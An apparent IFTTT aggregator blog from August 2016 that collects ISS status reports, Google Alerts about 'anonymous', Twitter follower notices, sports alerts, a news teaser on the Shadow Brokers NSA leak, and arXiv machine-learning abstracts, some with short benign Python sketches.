Collecting surface samples from FGB equipment and structures / r/g 3083
Oxygen Generation System (OGS) Hydrogen Sensor ORU Purge Adapter (HOPA) Operations
FLUID SHIFTS. OCT Hardware Setup in SM
FLUID SHIFTS. Connecting [OCT] Laptop to BRI r/g 3104
DOSETRK iPad data entry
DRAGON. Transfers
RSS2 Laptop SW Upgrade for Auto Data Downlink via RSPI r/g 3105
FLUID SHIFTS. OCT Power up in SM
Printing Housekeeping Procedure
DOSETRK Questionnaire Completion
Soyuz 720 Samsung Tablet Recharge, Initiate
Soyuz 731 Samsung Tablet Recharge – Terminate
FLUID SHIFTS. DPOAE Setup in SM
FLUID SHIFTS. Operator Assistance with Chibis and Gamma-1 r/g 3103
FLUID SHIFTS. Chibis Setup / r/g 3103
FLUID SHIFTS. TONO Hardware setup in SM
OGA Hydrogen Sensor R&R, Part 2
FLUID SHIFTS. Data Gathering in the SM, Subject
FLUID SHIFTS. Gathering Data in SM, Operator
Installation of ЗУ1А and Replacement of ЗУ1Б БР-9ЦУ-8 in FGB, Prep for Work, Clearing FGB panels r/g 3095
Fluid Shifts DPOAE Data Recovery
FLUID SHIFTS. Chibis Closeout Ops / r/g 3103
Water Recovery System Waste Water Tank Drain, Initiate
IMS Delta File Prep
IFM IMV Cleaning
FLUID SHIFTS. TONO SM Stowage
FLUID SHIFTS. OCT Power off in SM
OGA Hydrogen Sensor Cleaning
FLUID SHIFTS. Disconnecting OCT Laptop r/g 3106
DRAGON. Cargo Transfer Tagup […]

from ISS On-Orbit Status Report http://ift.tt/2b3nSzD
via IFTTT

Meet the Lawyer Who Defends Anonymous

You know Anonymous, the hacktivist group that performs cyber ops to advance social and political change. Now, meet Jay Leiderman, the ...

from Google Alert - anonymous http://ift.tt/2b6Aip8
via IFTTT

de la soul and the anonymous nobody

We are De La Soul. Preorder our new album.

from Google Alert - anonymous http://ift.tt/2beYqHY
via IFTTT

network-anonymous-tor

network-anonymous-tor is a Haskell API for Tor anonymous networking. Depends on: attoparsec, base, base32string, bytestring, exceptions, hexstring ...

from Google Alert - anonymous http://ift.tt/2b0T6Uz
via IFTTT

Wednesday, August 17, 2016

I have a new follower on Twitter


VCCC
Musician / Producer
Manchester, England
https://t.co/2WKA5MLVQG
Following: 350 - Followers: 293

August 17, 2016 at 11:55PM via Twitter http://twitter.com/VCCC_album

Dynamic Collaborative Filtering with Compound Poisson Factorization. (arXiv:1608.04839v1 [cs.LG])

Model-based collaborative filtering analyzes user-item interactions to infer latent factors that represent user preferences and item characteristics in order to predict future interactions. Most collaborative filtering algorithms assume that these latent factors are static, although it has been shown that user preferences and item perceptions drift over time. In this paper, we propose a conjugate and numerically stable dynamic matrix factorization (DCPF) based on compound Poisson matrix factorization that models the smoothly drifting latent factors using Gamma-Markov chains. We propose a numerically stable Gamma chain construction, and then present a stochastic variational inference approach to estimate the parameters of our model. We apply our model to time-stamped ratings data sets: Netflix, Yelp, and Last.fm, where DCPF achieves a higher predictive accuracy than state-of-the-art static and dynamic factorization models.
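The generative story is straightforward to simulate: latent factors follow Gamma-Markov chains whose expected value at each step equals the previous value, so they drift smoothly, and observed counts are Poisson given the current factors. A sketch (plain Poisson rather than the paper's compound Poisson, and made-up sizes):

```python
import numpy as np

rng = np.random.default_rng(0)
T, n_users, n_items, K = 12, 50, 40, 5   # time slices, users, items, factors

def gamma_chain(T, n, K, a=20.0):
    """Gamma-Markov chain with E[x_t | x_{t-1}] = x_{t-1}; larger a = smoother drift."""
    x = np.empty((T, n, K))
    x[0] = rng.gamma(2.0, 0.5, size=(n, K))
    for t in range(1, T):
        x[t] = rng.gamma(a, x[t - 1] / a)    # shape a, scale x_{t-1}/a
    return x

theta = gamma_chain(T, n_users, K)           # drifting user preferences
beta = gamma_chain(T, n_items, K)            # drifting item attributes

rate = np.einsum('tuk,tik->tui', theta, beta)  # Poisson rate per (time, user, item)
y = rng.poisson(rate)                           # observed interaction counts
print(y.shape, y[0].mean(), y[-1].mean())
```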



from cs.AI updates on arXiv.org http://ift.tt/2b2hb0A
via IFTTT

Towards Music Captioning: Generating Music Playlist Descriptions. (arXiv:1608.04868v1 [cs.MM])

Descriptions are often provided along with recommendations to help users' discovery. Recommending automatically generated music playlists (e.g. personalised playlists) introduces the problem of generating descriptions. In this paper, we propose a method for generating music playlist descriptions, which we call music captioning. In the proposed method, audio content analysis and natural language processing are adopted to utilise the information of each track.



from cs.AI updates on arXiv.org http://ift.tt/2boDSNF
via IFTTT

Open Problem: Approximate Planning of POMDPs in the class of Memoryless Policies. (arXiv:1608.04996v1 [cs.AI])

Planning plays an important role in the broad field of decision theory. Planning has drawn much attention in recent work in the robotics and sequential decision making areas. Recently, Reinforcement Learning (RL), as an agent-environment interaction problem, has brought further attention to planning methods. Generally in RL, one can assume a generative model, e.g. graphical models, for the environment, and then the task for the RL agent is to learn the model parameters and find the optimal strategy based on these learnt parameters. Based on environment behavior, the agent can assume various types of generative models, e.g. Multi Armed Bandit for a static environment, or Markov Decision Process (MDP) for a dynamic environment. The advantage of these popular models is their simplicity, which results in tractable methods of learning the parameters and finding the optimal policy. The drawback of these models is again their simplicity: these models usually underfit and underestimate the actual environment behavior. For example, in robotics, the agent usually has noisy observations of the environment inner state and MDP is not a suitable model.

More complex models like the Partially Observable Markov Decision Process (POMDP) can compensate for this drawback. Fitting this model to the environment, where the partial observation is given to the agent, generally gives dramatic performance improvement, sometimes unbounded improvement, compared to MDP. In general, finding the optimal policy for the POMDP model is computationally intractable and fully non-convex, even for the class of memoryless policies. The open problem is to come up with a method to find an exact or an approximate optimal stochastic memoryless policy for POMDP models.
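
To make the object of study concrete, the sketch below builds a tiny POMDP and estimates the value of one stochastic memoryless policy pi(a|o) by Monte Carlo (all numbers invented); the open problem is to optimize over such policies, not merely evaluate one:

```python
import numpy as np

rng = np.random.default_rng(0)

# A 2-state, 2-action, 2-observation POMDP.
P = np.array([[[0.9, 0.1], [0.2, 0.8]],     # P[a][s][s']: transition probabilities
              [[0.1, 0.9], [0.8, 0.2]]])
O = np.array([[0.8, 0.2], [0.3, 0.7]])       # O[s][o]: observation probabilities
R = np.array([[1.0, -1.0], [-1.0, 1.0]])     # R[s][a]: rewards

def evaluate(policy, episodes=2000, horizon=30, gamma=0.95):
    """Monte Carlo return of a memoryless policy: policy[o][a] = pi(a | o)."""
    total = 0.0
    for _ in range(episodes):
        s, g = rng.integers(2), 1.0
        for _ in range(horizon):
            o = rng.choice(2, p=O[s])        # the agent sees only the observation
            a = rng.choice(2, p=policy[o])   # action depends on o alone, no memory
            total += g * R[s][a]
            g *= gamma
            s = rng.choice(2, p=P[a][s])
    return total / episodes

pi = np.array([[0.9, 0.1], [0.1, 0.9]])
print("estimated value:", evaluate(pi))
```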



from cs.AI updates on arXiv.org http://ift.tt/2bfQIwm
via IFTTT

Practical optimal experiment design with probabilistic programs. (arXiv:1608.05046v1 [cs.AI])

Scientists often run experiments to distinguish competing theories. This requires patience, rigor, and ingenuity - there is often a large space of possible experiments one could run. But we need not comb this space by hand - if we represent our theories as formal models and explicitly declare the space of experiments, we can automate the search for good experiments, looking for those with high expected information gain. Here, we present a general and principled approach to experiment design based on probabilistic programming languages (PPLs). PPLs offer a clean separation between declaring problems and solving them, which means that the scientist can automate experiment design by simply declaring her model and experiment spaces in the PPL without having to worry about the details of calculating information gain. We demonstrate our system in two case studies drawn from cognitive psychology, where we use it to design optimal experiments in the domains of sequence prediction and categorization. We find strong empirical validation that our automatically designed experiments were indeed optimal. We conclude by discussing a number of interesting questions for future research.
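The quantity being maximized is expected information gain: for each candidate experiment, average the drop in entropy over the theory posterior across the outcomes the theories predict. A self-contained sketch with two made-up theories of a binary-outcome task:

```python
import numpy as np

# Two competing theories, each predicting P(success) for every stimulus x.
theories = {"A": lambda x: 0.2 + 0.6 * x, "B": lambda x: 0.8 - 0.6 * x}
prior = {"A": 0.5, "B": 0.5}
stimuli = np.linspace(0.0, 1.0, 11)          # the declared experiment space

def entropy(ps):
    ps = np.array([p for p in ps if p > 0])
    return float(-(ps * np.log(ps)).sum())

def expected_information_gain(x):
    h_prior = entropy(prior.values())
    eig = 0.0
    for y in (0, 1):                          # marginalize over possible outcomes
        likes = {t: (f(x) if y else 1.0 - f(x)) for t, f in theories.items()}
        p_y = sum(prior[t] * likes[t] for t in theories)
        post = [prior[t] * likes[t] / p_y for t in theories]
        eig += p_y * (h_prior - entropy(post))
    return eig

best = max(stimuli, key=expected_information_gain)
print("most informative stimulus:", best)    # an endpoint, where theories disagree most
```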



from cs.AI updates on arXiv.org http://ift.tt/2boE4wh
via IFTTT

Variational Information Maximizing Exploration. (arXiv:1605.09674v2 [cs.LG] UPDATED)

Scalable and effective exploration remains a key challenge in reinforcement learning (RL). While there are methods with optimality guarantees in the setting of discrete state and action spaces, these methods cannot be applied in high-dimensional deep RL scenarios. As such, most contemporary RL relies on simple heuristics such as epsilon-greedy exploration or adding Gaussian noise to the controls. This paper introduces Variational Information Maximizing Exploration (VIME), an exploration strategy based on maximization of information gain about the agent's belief of environment dynamics. We propose a practical implementation, using variational inference in Bayesian neural networks which efficiently handles continuous state and action spaces. VIME modifies the MDP reward function, and can be applied with several different underlying RL algorithms. We demonstrate that VIME achieves significantly better performance compared to heuristic exploration methods across a variety of continuous control tasks and algorithms, including tasks with very sparse rewards.
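The intrinsic reward in this scheme is the information gained about the dynamics model: the KL divergence from the pre-update posterior to the post-update posterior. VIME computes this variationally for Bayesian neural networks; the sketch below substitutes a conjugate Beta-Bernoulli dynamics model so the same quantity is exact:

```python
from scipy.special import digamma, gammaln

def kl_beta(a1, b1, a0, b0):
    """KL( Beta(a1, b1) || Beta(a0, b0) ): information gained by the update."""
    return (gammaln(a0) + gammaln(b0) - gammaln(a0 + b0)
            - gammaln(a1) - gammaln(b1) + gammaln(a1 + b1)
            + (a1 - a0) * digamma(a1) + (b1 - b0) * digamma(b1)
            + (a0 - a1 + b0 - b1) * digamma(a1 + b1))

# The agent models P(transition succeeds | state, action) with a Beta posterior.
a, b = 1.0, 1.0                       # uninformative prior
for outcome in [1, 1, 0, 1]:          # observed transitions
    a1, b1 = a + outcome, b + (1 - outcome)
    bonus = kl_beta(a1, b1, a, b)     # curiosity bonus added to the reward
    print(f"outcome {outcome}: intrinsic reward {bonus:.4f}")
    a, b = a1, b1                     # surprising outcomes earn larger bonuses
```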



from cs.AI updates on arXiv.org http://ift.tt/1RKQdoC
via IFTTT

Bayesian Optimization with Dimension Scheduling: Application to Biological Systems. (arXiv:1511.05385v1 [stat.ML] CROSS LISTED)

Bayesian Optimization (BO) is a data-efficient method for global black-box optimization of an expensive-to-evaluate fitness function. BO typically assumes that the computational cost of BO is cheap, while experiments are time consuming or costly. In practice, this allows us to optimize ten or fewer critical parameters in up to 1,000 experiments. But experiments may be less expensive than BO methods assume: in some simulation models, we may be able to conduct multiple thousands of experiments in a few hours, and the computational burden of BO is no longer negligible compared to experimentation time. To address this challenge we introduce a new Dimension Scheduling Algorithm (DSA), which reduces the computational burden of BO for many experiments. The key idea is that DSA optimizes the fitness function only along a small set of dimensions at each iteration. This DSA strategy (1) reduces the necessary computation time, (2) finds good solutions faster than the traditional BO method, and (3) can be parallelized straightforwardly. We evaluate the DSA in the context of optimizing parameters of dynamic models of microalgae metabolism and show faster convergence than traditional BO.
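
The scheduling idea is separable from the BO machinery: each iteration optimizes the fitness function over only a few randomly scheduled dimensions, holding the rest at the incumbent. A sketch with a cheap random probe standing in for the per-subset BO step (the actual algorithm fits a surrogate model over the scheduled dimensions):

```python
import numpy as np

rng = np.random.default_rng(0)

def fitness(x):                        # stand-in for the expensive black box
    return -np.sum((x - 0.3) ** 2)

D, k, n_iters = 10, 2, 300             # total dims, dims scheduled per iteration
x = rng.uniform(0.0, 1.0, D)           # incumbent solution
best = fitness(x)

for _ in range(n_iters):
    dims = rng.choice(D, size=k, replace=False)   # schedule a random subset
    cand = x.copy()
    cand[dims] = rng.uniform(0.0, 1.0, k)         # search only those dimensions
    f = fitness(cand)
    if f > best:
        x, best = cand, f

print("best fitness found:", best)
```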



from cs.AI updates on arXiv.org http://ift.tt/1SWYNUt
via IFTTT

MLB: Orioles (66-52) host Red Sox (66-52) with both teams 1.5 games back in AL East race; watch live in the ESPN App (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Anonymous notes left on bistro bike by mystery 'busybody'

Visit now for the latest Leith news - direct from the Edinburgh Evening News.

from Google Alert - anonymous http://ift.tt/2b1EswK
via IFTTT

Ravens: WR Steve Smith Sr. passes physical, activated off PUP list - multiple reports; tore Achilles in 2015 Week 8 (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

The NSA Hack — What, When, Where, How, Who & Why? Explained Here...

You might have heard about the recent ongoing drama of the NSA hack that has sparked a larger debate on the Internet concerning the abilities of US intelligence agencies as well as their own security. Saturday morning the news broke that a mysterious group of hackers calling themselves "The Shadow Brokers" claimed it hacked an NSA-linked group and released some NSA hacking tools with a promise to…


from The Hacker News http://ift.tt/2aZrPbn
via IFTTT

ISS Daily Summary Report – 08/16/2016

Fluid Shifts Imaging with Chibis in the Service Module (SM): With ground team assistance, crewmembers continued the final week of this set of Fluid Shifts operations by configuring the Ultrasound 2 hardware prior to performing ultrasound scans in the SM while using the Chibis. The Fluid Shifts investigation is divided into three segments: Dilution Measures, Baseline Imaging, and Baseline Imaging using the Russian Chibis Lower Body Negative Pressure (LBNP) device. The experiment measures how much fluid shifts from the lower body to the upper body, in or out of cells and blood vessels, and determines the impact these shifts have on fluid pressure in the head, changes in vision and eye structures.

Mouse Epigenetics Habitat Cage Unit Maintenance: The food cartridges of the Mouse Habitat Cage Units were exchanged, and then the cage units containing the mice were transferred to and from the glove box located in the Cell Biology Experiment Facility (CBEF) to complete standard maintenance activities. The Mouse Epigenetics investigation studies altered gene expression patterns in the organs of male mice that spend one month in space, and also examines changes in the deoxyribonucleic acid (DNA) of their offspring. Results from the investigation identify genetic alterations that happen after exposure to the microgravity environment of space.

Advanced Colloids Experiment Temperature control-1 (ACE-T1) Configuration: The crew accessed the Fluids Integrated Rack (FIR) and removed the Micro-channel Diffusion Plate and Bio Base from inside the Light Microscopy Module (LMM) Auxiliary Fluids Container (ACE) before installing the LMM Control Base, ACE Module, and Constrained Vapor Bubble (CVB) surveillance camera in preparation for the ACE-T1 experiment. ACE-T1 studies tiny suspended particles designed by scientists to connect themselves in a specific way to form organized structures in water. Materials having complex structures and unique properties potentially can be made with more knowledge of how these particles are joined together and the conditions which control their behaviors. The microgravity environment on the ISS provides researchers insight into the fundamental physics of microparticle self-assembly and the kinds of colloidal structures that are possible to fabricate. This in turn helps manufacturers on Earth in choosing which high-value material is worth investigating.

Combustion Integrated Rack (CIR) Fuel Oxidizer Management Assembly (FOMA) Calibration: The crew performed the FOMA calibration by closing the bottle valves and relieving the pressure in the manifolds. The FOMA Calibration Unit (FCU) was powered to collect pressure transducer data with the bottle pressure transducers at ambient pressure, and the rack was powered down. The crew then opened the bottle valves before closing up the rack. CIR provides sustained, systematic microgravity combustion research; it houses hardware capable of performing combustion experiments to further research of combustion in microgravity.

Fine Motor Skills: A series of interactive tasks on a touchscreen tablet were completed for the Fine Motor Skills investigation. This investigation is critical during long-duration space missions, particularly for those skills needed to interact with technologies required in next-generation space vehicles, spacesuits, and habitats. The crewmember's fine motor skills are also necessary for performing tasks in transit or on a planetary surface, such as information access, just-in-time training, subsystem maintenance, and medical treatment.

Habitability Human Factors Directed Observations: The crew recorded and submitted a narrated task video documenting observations of life onboard ISS, providing insight related to human factors and habitability. The Habitability investigation collects observations about the relationship between crew members and their environment on the ISS. Observations can help spacecraft designers understand how much habitable volume is required, and whether a mission's duration impacts how much space crew members need.

Today's Planned Activities
All activities were completed unless otherwise noted.
Soyuz 720 Kazbek Fit Check
FLUID SHIFTS. Activation of РБС for Ultrasound Equipment / r/g 3076
FLUID SHIFTS. Ultrasound 2 Setup and Activation in SM
Environmental Control & Life Support System (ECLSS) Tank Drain
FLUID SHIFTS. Comm configuration for the experiment / r/g 9995
MATRYOSHKA-R. BUBBLE-dosimeter gathering and measurements. Memory Card pre-pack for return r/g 3078
FLUID SHIFTS. Gathering and Connecting Equipment for TV coverage
Fine Motor Skills (FINEMOTR) Test
Environmental Control & Life Support System (ECLSS) Recycle Tank Drain Part 2
METEOR Ops
MOUSE Hardware Setup
FIR Rack Doors Open
FLUID SHIFTS. Operator Assistance with Chibis and Gamma-1 r/g 3085
FLUID SHIFTS. Chibis Setup / r/g 3085
WRS Recycle Tank Fill from EDV
Crew Prep for PAO
Light Microscopy Module (LMM). ACET1 Module Configuration
DRAGON. Transfers
FLUID SHIFTS. Ultrasound Ops in SM, Subject
FLUID SHIFTS. Ultrasound 2 Scan, Operator
Microbial Monitoring (RJR), Inspection of Surface Samples and Petri Dishes
FLUID SHIFTS. Chibis Closeout Ops / r/g 3085
RS Photo Cameras Sync Up to Station Time / r/g 1594
FLUID SHIFTS. Deactivation of РБС and USND / r/g 3077
PAO Hardware Setup
СОЖ Maintenance
FIR Rack Door Close
INTERP-MAI-75. HAM Radio Hardware Activation See note 5 r/g 3057
FLUID SHIFTS. CCFP hardware, HRF Laptop in SM
FLUID SHIFTS. Crew Onboard Support System (КСПЭ) Hardware Deactivation and Closing Applications on CP SSC
Combustion Integrated Rack (CIR) Valve Closure
PAO Event
FLUID SHIFTS. Restore nominal comm config
WRS Recycle Tank Fill from EDV
MRM2 comm config to support the P/L Ops
FLUID SHIFTS. Ultrasound 2 Stowage in SM
KULONOVSKIY KRISTALL. Experiment Ops r/g 3079
FLUID SHIFTS. Hardware Transfer to USOS
Microbial Monitoring (RJR), Handover of SSK and MAS Samples
Environmental Health System (EHS), Surface Sampler Kit (SSK) and Microbial Air Sampler (MAS) Sample Pack for return
MRM2 Comm Reconfig for Nominal Ops
WRS Recycle Tank Fill from EDV
HABIT Video Recording
XF305 Camcorder Settings Adjustment
MOUSE Habitat Cage Unit Cleaning
EVA Photo/Video Camera Config
KULONOVSKIY KRISTALL. Copy and Downlink Data / r/g 3079
Environmental Control & Life Support System (ECLSS) Recycle Tank Fill Part 3
HABIT Task Video End
DRAGON. Transfers
HMS Defibrillator Inspection
Symbolic Activity / r/g 3064
Distillate Filter & Purge Gas Filter Remove and Replace
MOUSE. Transportation Cage Unit Preparation
DRAGON. Cargo Transfer Tagup
Symbolic Activity / r/g 3064
CIR Valve Open
INTER-MAI-75. Equipment deactivation and cleanup / r/g 3057
In Flight Maintenance (IFM), Waste and Hygiene Compartment (WHC), Full Fill
HABIT Camcorder […]

from ISS On-Orbit Status Report http://ift.tt/2b0NHAs
via IFTTT

Migrate losing anonymous user record

I have some user migrations where I believe the anonymous user record is lost after some time. I cannot reproduce the exact steps; probably after rolling ...

from Google Alert - anonymous http://ift.tt/2bxJOT1
via IFTTT

I have a new follower on Twitter


Joan Carbonell
Several lifetimes of Projects + Learning + Sci-Fi + Family & Friends = obsession to inspire an amazing future. All opinions are my own.
Palma de Mallorca, Spain
http://t.co/sBlmpxRZuU
Following: 12573 - Followers: 14384

August 17, 2016 at 02:06AM via Twitter http://twitter.com/joancarbonell

I have a new follower on Twitter


Data Society
We envision a society where data science ignites conversations and collaboration across fields to solve problems we experience every day. #DataScienceEducation
Washington, DC
http://t.co/PvmdZct6VR
Following: 6940 - Followers: 9649

August 17, 2016 at 12:53AM via Twitter http://twitter.com/datasocietyco

Global Fires 2015-2016 B-Roll

B-roll for the July 28, 2016 live shot and interviews.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2b376PH
via IFTTT

Five Planets and the Moon over Australia


It is not a coincidence that planets line up. That's because all of the planets orbit the Sun in (nearly) a single sheet called the plane of the ecliptic. When viewed from inside that plane -- as Earth dwellers are likely to do -- the planets all appear confined to a single band. It is a coincidence, though, when several of the brightest planets all appear in nearly the same direction. Such a coincidence was captured just last week. Featured above, six planets and Earth's Moon were all imaged together last week, just before sunset, from Mornington Peninsula in Victoria, Australia. A second band is visible across the top of this tall image -- the central band of our Milky Way Galaxy. via NASA http://ift.tt/2bClNx6

Tuesday, August 16, 2016

I have a new follower on Twitter


Fiona Green
28 years in #sportsbiz now focusing on the use of #CRM and BI with sports rights holders to drive #fanengagement, participation, insight and revenue

http://t.co/rdzvQqzGha
Following: 3091 - Followers: 6396

August 16, 2016 at 10:51PM via Twitter http://twitter.com/fionagreen66

I have a new follower on Twitter


Robert Osborne
Husband, Father, and Water Resources Engineer with Black & Veatch.
South Carolina
http://t.co/vjx9j8NZep
Following: 1891 - Followers: 3375

August 16, 2016 at 10:22PM via Twitter http://twitter.com/watercrunch

I have a new follower on Twitter


Samiran Ghosh
APAC Tech Leader @DnBUS. Accidental Technologist. #CIO. #Digital Evangelist. Movie Buff. Love Comics & #SocialMedia. Guest Speaker. Blogger. All views personal
Global Citizen
https://t.co/47APw6b8Yy
Following: 4066 - Followers: 4662

August 16, 2016 at 09:51PM via Twitter http://twitter.com/samiranghosh

No-Hitter Watch: Orioles' Steve Pearce singles to break up Red Sox's Eduardo Rodriguez and Matt Barnes' combined no-hitter (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

No-Hitter Watch: Red Sox's Eduardo Rodriguez and Matt Barnes have not allowed a hit through 6 innings vs. the Orioles (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

TerpreT: A Probabilistic Programming Language for Program Induction. (arXiv:1608.04428v1 [cs.LG])

We study machine learning formulations of inductive program synthesis; given input-output examples, we try to synthesize source code that maps inputs to corresponding outputs. Our aims are to develop new machine learning approaches based on neural networks and graphical models, and to understand the capabilities of machine learning techniques relative to traditional alternatives, such as those based on constraint solving from the programming languages community.

Our key contribution is the proposal of TerpreT, a domain-specific language for expressing program synthesis problems. TerpreT is similar to a probabilistic programming language: a model is composed of a specification of a program representation (declarations of random variables) and an interpreter describing how programs map inputs to outputs (a model connecting unknowns to observations). The inference task is to observe a set of input-output examples and infer the underlying program. TerpreT has two main benefits. First, it enables rapid exploration of a range of domains, program representations, and interpreter models. Second, it separates the model specification from the inference algorithm, allowing like-to-like comparisons between different approaches to inference. From a single TerpreT specification we automatically perform inference using four different back-ends. These are based on gradient descent, linear program (LP) relaxations for graphical models, discrete satisfiability solving, and the Sketch program synthesis system.

We illustrate the value of TerpreT by developing several interpreter models and performing an empirical comparison between alternative inference algorithms. Our key empirical finding is that constraint solvers dominate the gradient descent and LP-based formulations. We conclude with suggestions for the machine learning community to make progress on program synthesis.
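
Whatever the back-end, the underlying problem is the same: search a declared program space for a program consistent with the input-output examples. The smallest possible illustration (a made-up two-instruction space, with brute-force enumeration standing in for the gradient, LP, SAT, and Sketch back-ends):

```python
import itertools

examples = [(0, 1), (1, 3), (2, 5)]           # unknown target: y = 2*x + 1

# Declared program space: op2(op1(x, c1), c2) with small integer constants.
ops = {"add": lambda x, c: x + c, "mul": lambda x, c: x * c}

def programs():
    for (n1, f1), c1, (n2, f2), c2 in itertools.product(
            ops.items(), range(4), ops.items(), range(4)):
        name = f"{n2}({n1}(x, {c1}), {c2})"
        yield name, (lambda x, f1=f1, c1=c1, f2=f2, c2=c2: f2(f1(x, c1), c2))

# 'Inference' = find any program consistent with all observations.
for name, prog in programs():
    if all(prog(x) == y for x, y in examples):
        print("consistent program:", name)     # e.g. add(mul(x, 2), 1)
        break
```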



from cs.AI updates on arXiv.org http://ift.tt/2blJAQd
via IFTTT

Free Lunch for Optimisation under the Universal Distribution. (arXiv:1608.04544v1 [math.OC])

Function optimisation is a major challenge in computer science. The No Free Lunch theorems state that if all functions with the same histogram are assumed to be equally probable then no algorithm outperforms any other in expectation. We argue against the uniform assumption and suggest a universal prior exists for which there is a free lunch, but where no particular class of functions is favoured over another. We also prove upper and lower bounds on the size of the free lunch.



from cs.AI updates on arXiv.org http://ift.tt/2bcuRWs
via IFTTT

Informal Physical Reasoning Processes. (arXiv:1608.04672v1 [cs.AI])

A fundamental question is whether Turing machines can model all reasoning processes. We introduce an existence principle stating that the perception of the physical existence of any Turing program can serve as a physical causation for the application of any Turing-computable function to this Turing program. The existence principle overcomes the limitation of the outputs of Turing machines to lists, that is, recursively enumerable sets. The principle is illustrated by productive partial functions for productive sets such as the set of the Goedel numbers of the Turing-computable total functions. The existence principle and productive functions imply the existence of physical systems whose reasoning processes cannot be modeled by Turing machines. These systems are called creative. Creative systems can prove the undecidable formula in Goedel's theorem in another formal system which is constructed at a later point in time. A hypothesis about creative systems, which is based on computer experiments, is introduced.



from cs.AI updates on arXiv.org http://ift.tt/2blJmsp
via IFTTT

A Shallow High-Order Parametric Approach to Data Visualization and Compression. (arXiv:1608.04689v1 [cs.AI])

Explicit high-order feature interactions efficiently capture essential structural knowledge about the data of interest and have been used for constructing generative models. We present a supervised discriminative High-Order Parametric Embedding (HOPE) approach to data visualization and compression. Compared to deep embedding models with complicated deep architectures, HOPE generates more effective high-order feature mapping through an embarrassingly simple shallow model. Furthermore, two approaches to generating a small number of exemplars conveying high-order interactions to represent large-scale data sets are proposed. These exemplars in combination with the feature mapping learned by HOPE effectively capture essential data variations. Moreover, through HOPE, these exemplars are employed to increase the computational efficiency of kNN classification for fast information retrieval by thousands of times. For classification in two-dimensional embedding space on MNIST and USPS datasets, our shallow method HOPE with simple Sigmoid transformations significantly outperforms state-of-the-art supervised deep embedding models based on deep neural networks, and even achieves a historically low test error rate of 0.65% in two-dimensional space on MNIST, which demonstrates the representational efficiency and power of supervised shallow models with high-order feature interactions.



from cs.AI updates on arXiv.org http://ift.tt/2bctBme
via IFTTT

Evaluating Causal Models by Comparing Interventional Distributions. (arXiv:1608.04698v1 [cs.AI])

The predominant method for evaluating the quality of causal models is to measure the graphical accuracy of the learned model structure. We present an alternative method for evaluating causal models that directly measures the accuracy of estimated interventional distributions. We contrast such distributional measures with structural measures, such as structural Hamming distance and structural intervention distance, showing that structural measures often correspond poorly to the accuracy of estimated interventional distributions. We use a number of real and synthetic datasets to illustrate various scenarios in which structural measures provide misleading results with respect to algorithm selection and parameter tuning, and we recommend that distributional measures become the new standard for evaluating causal models.



from cs.AI updates on arXiv.org http://ift.tt/2blIQuD
via IFTTT

Learning values across many orders of magnitude. (arXiv:1602.07714v2 [cs.LG] UPDATED)

Most learning algorithms are not invariant to the scale of the function that is being approximated. We propose to adaptively normalize the targets used in learning. This is useful in value-based reinforcement learning, where the magnitude of appropriate value approximations can change over time when we update the policy of behavior. Our main motivation is prior work on learning to play Atari games, where the rewards were all clipped to a predetermined range. This clipping facilitates learning across many different games with a single learning algorithm, but a clipped reward function can result in qualitatively different behavior. Using the adaptive normalization we can remove this domain-specific heuristic without diminishing overall performance.
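
A minimal sketch of the core idea, adaptively rescaling regression targets with running statistics (simplified: the paper's method additionally adjusts the output layer's weights so that unnormalized predictions are preserved whenever the scale changes):

```
import numpy as np

class AdaptiveTargetNormalizer:
    """Track a running mean and second moment of the targets and use
    them to normalize the values a learner regresses toward."""
    def __init__(self, beta=1e-3):
        self.beta = beta                     # step size for the running statistics
        self.mean, self.second_moment = 0.0, 1.0

    def observe(self, target):
        self.mean += self.beta * (target - self.mean)
        self.second_moment += self.beta * (target ** 2 - self.second_moment)

    def normalize(self, target):
        std = np.sqrt(max(self.second_moment - self.mean ** 2, 1e-8))
        return (target - self.mean) / std

# usage: normalize targets before computing the regression loss
norm = AdaptiveTargetNormalizer()
for target in [0.1, 250.0, -3.0, 10000.0]:   # values spanning many magnitudes
    norm.observe(target)
    scaled = norm.normalize(target)          # roughly unit-scale target
```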



from cs.AI updates on arXiv.org http://ift.tt/1Qit6Cj
via IFTTT

Learning to Track at 100 FPS with Deep Regression Networks. (arXiv:1604.01802v2 [cs.CV] UPDATED)

Machine learning techniques are often used in computer vision due to their ability to leverage large amounts of training data to improve performance. Unfortunately, most generic object trackers are still trained from scratch online and do not benefit from the large number of videos that are readily available for offline training. We propose a method for offline training of neural networks that can track novel objects at test-time at 100 fps. Our tracker is significantly faster than previous methods that use neural networks for tracking, which are typically very slow to run and not practical for real-time applications. Our tracker uses a simple feed-forward network with no online training required. The tracker learns a generic relationship between object motion and appearance and can be used to track novel objects that do not appear in the training set. We test our network on a standard tracking benchmark to demonstrate our tracker's state-of-the-art performance. Further, our performance improves as we add more videos to our offline training set. To the best of our knowledge, our tracker is the first neural-network tracker that learns to track generic objects at 100 fps.



from cs.AI updates on arXiv.org http://ift.tt/1XkoPmu
via IFTTT

Multi-way Monte Carlo Method for Linear Systems. (arXiv:1608.04361v1 [cs.NA])

We study the Monte Carlo method for solving a linear system of the form $x = H x + b$. A sufficient condition for the method to work is $\| H \| < 1$, which greatly limits the usability of this method. We improve this condition by proposing a new multi-way Markov random walk, which is a generalization of the standard Markov random walk. Under our new framework we prove that the necessary and sufficient condition for our method to work is the spectral radius $\rho(H^{+}) < 1$, which is a weaker requirement than $\| H \| < 1$. In addition to solving more problems, our new method can work faster than the standard algorithm. In numerical experiments on both synthetic and real world matrices, we demonstrate the effectiveness of our new method.
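
For reference, a sketch of the standard single-chain Monte Carlo estimator that this work generalizes: estimate one component of $x = \sum_k H^k b$ by random walks with importance weights (uniform transition probabilities shown here; valid when the Neumann series converges, e.g. $\| H \| < 1$):

```
import numpy as np

def mc_component(H, b, i, n_walks=20000, n_steps=40, seed=0):
    """Monte Carlo estimate of x[i] for x = Hx + b via the truncated
    Neumann series sum_k (H^k b)[i], sampled with uniform random walks."""
    rng = np.random.default_rng(seed)
    n = H.shape[0]
    total = 0.0
    for _ in range(n_walks):
        state, weight, acc = i, 1.0, b[i]   # k = 0 term
        for _ in range(n_steps):
            nxt = rng.integers(n)           # transition probability 1/n
            weight *= H[state, nxt] * n     # importance weight H_st / P_st
            state = nxt
            acc += weight * b[state]        # contribution of the k-th term
        total += acc
    return total / n_walks

H = np.array([[0.1, 0.3], [0.2, 0.1]])
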